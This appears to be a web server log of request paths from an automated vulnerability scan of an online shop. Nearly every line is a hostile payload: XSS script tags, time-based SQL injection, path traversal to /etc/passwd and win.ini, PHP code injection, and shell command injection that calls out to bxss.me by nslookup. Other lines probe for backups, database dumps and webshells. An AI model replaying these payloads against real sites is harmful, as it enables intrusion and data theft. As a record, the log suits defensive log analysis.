/acc/skin'\"()&%25<acx><ScRiPt%20>8tiP(9756)<%2fScRiPt>/frontend/ 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/uploader/ 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>q8Xa(9193)<%2fScRiPt>/adminhtml/browser.js 1 https://104.36.149.61/
/|echo%20wdiobs$()\\%20ruehgd\\nz^xyu||a%20%23'%20|echo%20wdiobs$()\\%20ruehgd\\nz^xyu||a%20%23|\"%20|echo%20wdiobs$()\\%20ruehgd\\nz^xyu||a%20%23/js/mage/adminhtml/giftmessage.js 1 -
/qqRNTaRB')%20OR%20376=(SELECT%20376%20FROM%20PG_SLEEP(15))--/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/iestyles.css 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'IGAB'!='IGAB%25/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/'+response.write(9901155*9552789)+'/js/prototype/tooltip.js 1 -
/E05cTHZT'))%20OR%20782=(SELECT%20782%20FROM%20PG_SLEEP(15))--/js/prototype/tooltip.js 1 https://104.36.149.61/
/%2fxfs.bxss.me/skin/install/default/default/css/iestyles.css 1 -
/WEB-INF/web.xml.bak 1 -
/WEB-INF/Copy%20of%20web.xml 1 -
/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php 1 -
//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd 1 -
/${@print(md5(31337))}/js/prototype/windows/ 1 -
/acc/js/mage/.%2fadminhtml/accordion.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/product/ 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/events.js 1 -
/acc/skin/install/default/%2fxfs.bxss.me/css/boxes.css 1 -
/@@nOAhD/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>WvSu(9980)<%2fScRiPt>/js/mage/adminhtml/events.js 1 https://104.36.149.61/
//./WEB-INF/web.xml 1 -
/'\"/js/mage/adminhtml/sales/ 1 -
/horde/imp/test.php 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/install/default/default/css/iestyles.css 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/form.js 1 https://104.36.149.61/
/acc9817919/js/prototype/debug.js 1 https://104.36.149.61/
/admin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/104.36.149.61-backup.tar 1 -
/dbdump.7z 1 -
/acc/%3b(nslookup%20hitaaezosonph99877.bxss.me||perl%20-e%20\"gethostbyname('hitaaezosonph99877.bxss.me')\")|(nslookup%20hitaaezosonph99877.bxss.me||perl%20-e%20\"gethostbyname('hitaaezosonph99877.bxss.me')\")&(nslookup%20hitaaezosonph99877.bxss.me||perl%2 1 -
/acc/index.php/install/wizard//../WEB-INF/web.xml%00.jsp 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/flexuploader.js 1 -
/.%2facc/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/|(nslookup%20hitfvaekpceunb6940.bxss.me||perl%20-e%20\"gethostbyname('hitfvaekpceunb6940.bxss.me')\")/js/mage/adminhtml/grid.js 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/ 1 https://104.36.149.61/
/acc/skin/install/default/default/css<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/boxes.css 1 -
/acc/'\"()&%25<acx><ScRiPt%20>QlCt(9036)<%2fScRiPt>/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/default/default/css/boxes.css 1 https://104.36.149.61/
/../debug.js 1 -
/<!--/js/mage/adminhtml/wysiwyg/ 1 -
/acc/js/..%2fprototype/extended_debug.js 1 https://104.36.149.61/
/ZDjvnQ3A'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/system_api.php 4 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/`(nslookup%20hitmmuxdovxezc9c74.bxss.me||perl%20-e%20\"gethostbyname('hitmmuxdovxezc9c74.bxss.me')\")`/index.php/install/ 1 -
//../../../../../../../../windows/win.ini 2 -
/acc'\"()&%25<acx><ScRiPt%20>xIbD(9943)<%2fScRiPt>/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/authenticationendpoint/color.jsp 1 -
/acc9491425/skin/install/default/ 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/mage/ 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/sales/ 1 -
/$(nslookup%20hitwfvwpybyske4adf.bxss.me||perl%20-e%20\"gethostbyname('hitwfvwpybyske4adf.bxss.me')\")/js/prototype/tooltip.js 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(111).concat(68).concat(98).concat(85)+(require\"socket\"%0aSocket.gethostbyname(\"hitfp\"+\"tjiibjdmee444.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/ 1 -
/acc/skin/install/bxss.me%2ft%2fxss.html%3f%2500/default/css/reset.css 1 -
/acc/skin/%2fxfs.bxss.me/ 1 -
/acc/%3b(nslookup%20hitkbtizpbjaqe9709.bxss.me||perl%20-e%20\"gethostbyname('hitkbtizpbjaqe9709.bxss.me')\")|(nslookup%20hitkbtizpbjaqe9709.bxss.me||perl%20-e%20\"gethostbyname('hitkbtizpbjaqe9709.bxss.me')\")&(nslookup%20hitkbtizpbjaqe9709.bxss.me||perl%2 1 -
/bxss.me/js/varien/js.js 1 https://104.36.149.61/
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>KYzi(9674)<%2fScRiPt>/image.js 1 https://104.36.149.61/
/echo%20uzkvhc$()\\%20zekygz\\nz^xyu||a%20%23'%20&echo%20uzkvhc$()\\%20zekygz\\nz^xyu||a%20%23|\"%20&echo%20uzkvhc$()\\%20zekygz\\nz^xyu||a%20%23/skin/install/default/default/css/boxes.css 1 -
/acc/skin/install/1%00%c0%a7%c0%a2%252527%252522/default/css/iestyles.css 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/mage/adminhtml/backup.js 1 -
/'\"()&%25<acx><ScRiPt%20>PQf4(9351)<%2fScRiPt>/skin/adminhtml/ 1 https://104.36.149.61/
/.%2facc/js/prototype/prototype.js 1 https://104.36.149.61/
/railo-context/admin/update.cfm 1 -
/acc/skin/install/default/default/css'\"()&%25<acx><ScRiPt%20>c1E3(9501)<%2fScRiPt>/ie7minus.css 1 https://104.36.149.61/
/global/phpthumb/phpThumb.php 1 -
/|echo%20vzfbgl$()\\%20qdmska\\nz^xyu||a%20%23'%20|echo%20vzfbgl$()\\%20qdmska\\nz^xyu||a%20%23|\"%20|echo%20vzfbgl$()\\%20qdmska\\nz^xyu||a%20%23/js/mage/adminhtml/backup.js 1 -
/adminer-4.4.0-en.php 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/cgi-bin/.sh_history 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/index.php/install/wizard//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini 2 -
//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini 1 -
/acc/index.php/install/wizard//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini 1 -
/nSDqUmZC'))%20OR%20252=(SELECT%20252%20FROM%20PG_SLEEP(15))--/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc9016026/js/prototype/ 1 https://104.36.149.61/
/acc/skin/.%2fadminhtml/ 1 https://104.36.149.61/
/${@print(md5(31337))}\\/index.php/install/wizard/config/ 1 -
/acc/'\"()&%25<acx><ScRiPt%20>gf47(9188)<%2fScRiPt>/mage/adminhtml/ 1 https://104.36.149.61/
/)/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/mage/translate.js 1 -
/\".gethostbyname(lc(\"hitkt\".\"sirwsvuba54bd.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(119).chr(67).chr(106).chr(85).\"/js/mage/adminhtml/image.js 1 -
//configuration.inc 1 -
/Http://bxss.me/t/fit.txt/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/backup.js 1 https://104.36.149.61/
/acc/index.php/install/wizard//........................................................................../../../../../../../../windows/win.ini 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/index.php/install/ 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/iestyles.css 1 -
/flu/403.html 4 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/install/default/default/css/clears.css 1 -
/acc'\"()&%25<acx><ScRiPt%20>dgnk(9630)<%2fScRiPt>/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/ 1 -
//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini 2 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/windows/ 1 -
/104-backup.sql 1 -
/acc/skin/install/default/..%2fdefault/ 1 https://104.36.149.61/
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/dswsbobje/services/listServices 1 -
/if(now()=sysdate(),sleep(15),0)/js/varien/form.js 1 https://104.36.149.61/
/acc/skin/install/default/default'\"()&%25<acx><ScRiPt%20>xIbD(9494)<%2fScRiPt>/css/reset.css 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/varien/form.js 1 https://104.36.149.61/
/acc/index.php/install//../../../../../../../../etc/passwd%00en 1 -
/acc/skin/install/default/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/acc/js/varien/form'\"()&%25<acx><ScRiPt%20>TmT7(9762)<%2fScRiPt>.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2fweb.config 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/prototype/debug.js 1 https://104.36.149.61/
/backup_104.zip 1 -
/-1%20OR%203+845-845-1=0+0+0+1/skin/adminhtml/ 1 https://104.36.149.61/
/`(nslookup%20hitjpwncrlwvz0b5da.bxss.me||perl%20-e%20\"gethostbyname('hitjpwncrlwvz0b5da.bxss.me')\")`/index.php/install/wizard/locale/ 1 -
/phpmyadmin/main.php 1 -
/${9999157+10000366}/skin/install/default/default/ 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/js/mage/..%2fadminhtml/form.js 1 https://104.36.149.61/
/0402pcuO'%20OR%20586=(SELECT%20586%20FROM%20PG_SLEEP(15))--/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>q8Xa(9550)<%2fScRiPt>/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/&(nslookup%20hitvezzpiarrd85ac6.bxss.me||perl%20-e%20\"gethostbyname('hitvezzpiarrd85ac6.bxss.me')\")&'\\\"`0&(nslookup%20hitvezzpiarrd85ac6.bxss.me||perl%20-e%20\"gethostbyname('hitvezzpiarrd85ac6.bxss.me')\")&`'/js/mage/adminhtml/accordion.js 1 -
/`(nslookup%20hitpllxhyvdywa6766.bxss.me||perl%20-e%20\"gethostbyname('hitpllxhyvdywa6766.bxss.me')\")`/skin/install/default/default/css/ie7minus.css 1 -
/%2fxfs.bxss.me/js/prototype/windows/ 1 -
/acc/index.php/install/wizard/locale'\"()&%25<acx><ScRiPt%20>6DR8(9176)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>QEM2(9991)<%2fScRiPt>/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/wp-content/plugins/invit0r/lib/php-ofc-library/php-ofc-library/ofc_upload_image.php 1 -
/if(now()=sysdate(),sleep(15),0)/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/|(nslookup%20hitdypmcsisonebf08.bxss.me||perl%20-e%20\"gethostbyname('hitdypmcsisonebf08.bxss.me')\")/js/mage/translate.js 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>fBHE(9801)<%2fScRiPt>/prototype/extended_debug.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/..%2fskin/install/default/ 1 https://104.36.149.61/
/application.wadl 1 -
/acc/%3b(nslookup%20hitbvvwlbbsntbb664.bxss.me||perl%20-e%20\"gethostbyname('hitbvvwlbbsntbb664.bxss.me')\")|(nslookup%20hitbvvwlbbsntbb664.bxss.me||perl%20-e%20\"gethostbyname('hitbvvwlbbsntbb664.bxss.me')\")&(nslookup%20hitbvvwlbbsntbb664.bxss.me||perl%2 1 -
/104_database.sql.gz 1 -
/acc/js/.%2fvarien/js.js 1 https://104.36.149.61/
/\"+response.write(9777240*9340419)+\"/index.php/install/wizard/locale/ 1 -
/acc/index.php/install//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd 1 -
/|(nslookup%20hitdyjeunitvadc5dd.bxss.me||perl%20-e%20\"gethostbyname('hitdyjeunitvadc5dd.bxss.me')\")/js/mage/adminhtml/backup.js 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/flexuploader.js 1 https://104.36.149.61/
//configuration.php 1 -
/^(%23$!@%23$)(()))******/js/prototype/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/backup.js 1 -
/&echo%20mxdwlj$()\\%20ygrall\\nz^xyu||a%20%23'%20&echo%20mxdwlj$()\\%20ygrall\\nz^xyu||a%20%23|\"%20&echo%20mxdwlj$()\\%20ygrall\\nz^xyu||a%20%23/skin/install/default/default/css/clears.css 1 -
/acc/js/mage/..%2fadminhtml/giftmessage.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/ 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/product/ 1 https://104.36.149.61/
/acc/skin/install/default/1%00%c0%a7%c0%a2%252527%252522/css/boxes.css 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/grid.js 1 -
/acc/skin/install/default/bxss.me%2ft%2fxss.html%3f%2500/css/iestyles.css 1 -
/-1%20OR%202+492-492-1=0+0+0+1/js/mage/adminhtml/ 1 https://104.36.149.61/
/104-db.sql.tar 1 -
/|echo%20sgfdtb$()\\%20hvgtjx\\nz^xyu||a%20%23'%20|echo%20sgfdtb$()\\%20hvgtjx\\nz^xyu||a%20%23|\"%20|echo%20sgfdtb$()\\%20hvgtjx\\nz^xyu||a%20%23/js/mage/translate.js 1 -
/N5UOx66k'%20OR%2011=(SELECT%2011%20FROM%20PG_SLEEP(15))--/skin/install/default/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/.%2flocale/ 1 https://104.36.149.61/
/acc/skin'\"()&%25<acx><ScRiPt%20>gumy(9619)<%2fScRiPt>/adminhtml/default/ 1 https://104.36.149.61/
/webadmin/Index.action 1 -
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/form.js 1 -
/`(nslookup%20hitefiqgsetmpf54cf.bxss.me||perl%20-e%20\"gethostbyname('hitefiqgsetmpf54cf.bxss.me')\")`/js/prototype/windows/themes/ 1 -
/acc/skin/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/css/boxes.css 1 -
/acc'\"()&%25<acx><ScRiPt%20>ll2Q(9854)<%2fScRiPt>/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/skin/install/default/default/css/./WEB-INF/web.xml%00.jsp 2 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/giftoptions/ 1 -
/(nslookup%20hitmjzkderpidffa19.bxss.me||perl%20-e%20\"gethostbyname('hitmjzkderpidffa19.bxss.me')\")/js/mage/adminhtml/ 1 -
/acc/skin/install/default/default/1some_inexistent_file_with_long_name%00.jpg/boxes.css 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>Ijhk(9665)<%2fScRiPt>/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/bxss.me/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/js/prototype/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/accordion.js 1 https://104.36.149.61/
/acc/skin/.%2finstall/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/skin/install/%2fxfs.bxss.me/default/css/clears.css 1 -
/1'\"/js/prototype/extended_debug.js 1 https://104.36.149.61/
/public/scripts/openflashchart/open-flash-chart/php-ofc-library/ofc_upload_image.php 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/clears.css 1 -
/WEB-INF/jboss-web.xml 1 -
/acc/skin/bxss.me%2ft%2fxss.html%3f%2500/default/default/css/reset.css 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/hash.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/104_dump.sql.tar 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/ 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/image.js 1 -
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/events.js 1 -
/js/extjs//examples/feed-viewer/feed-proxy.php 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/skin/install/default/default/css/%2fxfs.bxss.me.css 1 -
/login.html 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/windows/ 1 https://104.36.149.61/
/config.json 1 -
/r.php 1 -
/(nslookup%20hitzgcnnsfdoza784b.bxss.me||perl%20-e%20\"gethostbyname('hitzgcnnsfdoza784b.bxss.me')\")/js/prototype/extended_debug.js 1 -
/${@print(md5(31337))}/skin/install/default/default/ 1 -
/acc/index.php/../../../../../web.config 1 -
/104-db.tar 1 -
/acc/..%2fjs/prototype/windows/themes/ 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/varien/js.js 1 -
/acc/skin/install/..%2fdefault/default/css/reset.css 1 https://104.36.149.61/
/acc/index.php/install/..%2fwizard/config/ 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/css/clears.css 1 https://104.36.149.61/
/)/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/skin/install/%2fxfs.bxss.me/default/css/boxes.css 1 -
/backup-104.sql 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/skin/install/default/%3b(nslookup%20hituuydwmwllgb901a.bxss.me||perl%20-e%20\"gethostbyname('hituuydwmwllgb901a.bxss.me')\")|(nslookup%20hituuydwmwllgb901a.bxss.me||perl%20-e%20\"gethostbyname('hituuydwmwllgb901a.bxss.me')\")&(nslookup%20hituuydwmwllg 1 -
/${@print(md5(31337))}\\/index.php/install/wizard/locale/ 1 -
/acc9028353/js/mage/ 1 https://104.36.149.61/
/* 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>QlCt(9470)<%2fScRiPt>/adminhtml/accordion.js 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"66wx\"=\"66wx/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/console/j_security_check 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>WvSu(9855)<%2fScRiPt>/mage/adminhtml/events.js 1 https://104.36.149.61/
/JYgVCHUu'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/varien/js.js 1 https://104.36.149.61/
/)/skin/frontend/ 1 https://104.36.149.61/
/acc/skin/install/default/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/css/iestyles.css 1 -
/database.sql.gz 1 -
/`(nslookup%20hitwnxkgndjna746f0.bxss.me||perl%20-e%20\"gethostbyname('hitwnxkgndjna746f0.bxss.me')\")`/js/prototype/debug.js 1 -
/response.write(9173975*9024629)/skin/install/default/default/css/iestyles.css 1 -
/-1%20OR%203+912-912-1=0+0+0+1/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc'||'/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/wgd8lB3a/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
//js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/skin/adminhtml/ 1 -
/acc/.%2fjs/mage/adminhtml/product/ 1 https://104.36.149.61/
/..%2facc/js/varien/form.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/prototype/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.php/install/wizard/config/ 1 https://104.36.149.61/
/.nano_history 1 -
/'+response.write(9279074*9175149)+'/js/mage/adminhtml/giftoptions/ 1 -
/1'\"/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/mage'\"()&%25<acx><ScRiPt%20>ZcmW(9262)<%2fScRiPt>/adminhtml/grid.js 1 https://104.36.149.61/
/104.36.149.61.tar 1 -
/cgi-bin/Dockerfile 1 -
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/wysiwyg/ 1 -
/OQeAAJMz'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/-1%20OR%203+414-414-1=0+0+0+1/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/$(nslookup%20hitoukzfbkvpo06e14.bxss.me||perl%20-e%20\"gethostbyname('hitoukzfbkvpo06e14.bxss.me')\")/js/prototype/ 1 -
/acc/js/%3b(nslookup%20hitbyhcvuoklgddace.bxss.me||perl%20-e%20\"gethostbyname('hitbyhcvuoklgddace.bxss.me')\")|(nslookup%20hitbyhcvuoklgddace.bxss.me||perl%20-e%20\"gethostbyname('hitbyhcvuoklgddace.bxss.me')\")&(nslookup%20hitbyhcvuoklgddace.bxss.me||per 1 -
/'\"()&%25<acx><ScRiPt%20>IUUR(9825)<%2fScRiPt>/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/invoker/EJBInvokerServlet 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/flexuploader.js 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/index.php/install/wizard/config/ 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/aspxspy.aspx 1 -
/acc/index.php/../../../package-lock.json 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/varien/js.js 1 https://104.36.149.61/
/$(nslookup%20hitjayhnvjass33fd2.bxss.me||perl%20-e%20\"gethostbyname('hitjayhnvjass33fd2.bxss.me')\")/skin/adminhtml/ 1 -
/php-backdoor.php 1 -
/-1%20OR%202+306-306-1=0+0+0+1/js/prototype/validation.js 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/tooltip.js 1 https://104.36.149.61/
//..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd 1 -
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/accordion.js 1 -
/actuator/env 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/${9999222+9999157}/js/scriptaculous/effects.js 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/skin/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/css/ie7minus.css 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'1zyt'!='1zyt%25/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/tooltip_manager.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/windows/themes/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/js/..%2fprototype/validation.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//../../../../../../../../windows/win.ini%00 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/default/css/ie7minus.css 1 https://104.36.149.61/
/..%2f..%2fweb.config 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/reset.css 1 https://104.36.149.61/
/\"+response.write(9504856*9376755)+\"/js/mage/adminhtml/backup.js 1 -
/../package.json 1 -
/acc/js/prototype'\"()&%25<acx><ScRiPt%20>ntvJ(9443)<%2fScRiPt>/validation.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/index.php/install/wizard/locale/ 1 -
/|(nslookup%20hitfghitxoastb1749.bxss.me||perl%20-e%20\"gethostbyname('hitfghitxoastb1749.bxss.me')\")/js/mage/adminhtml/form.js 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
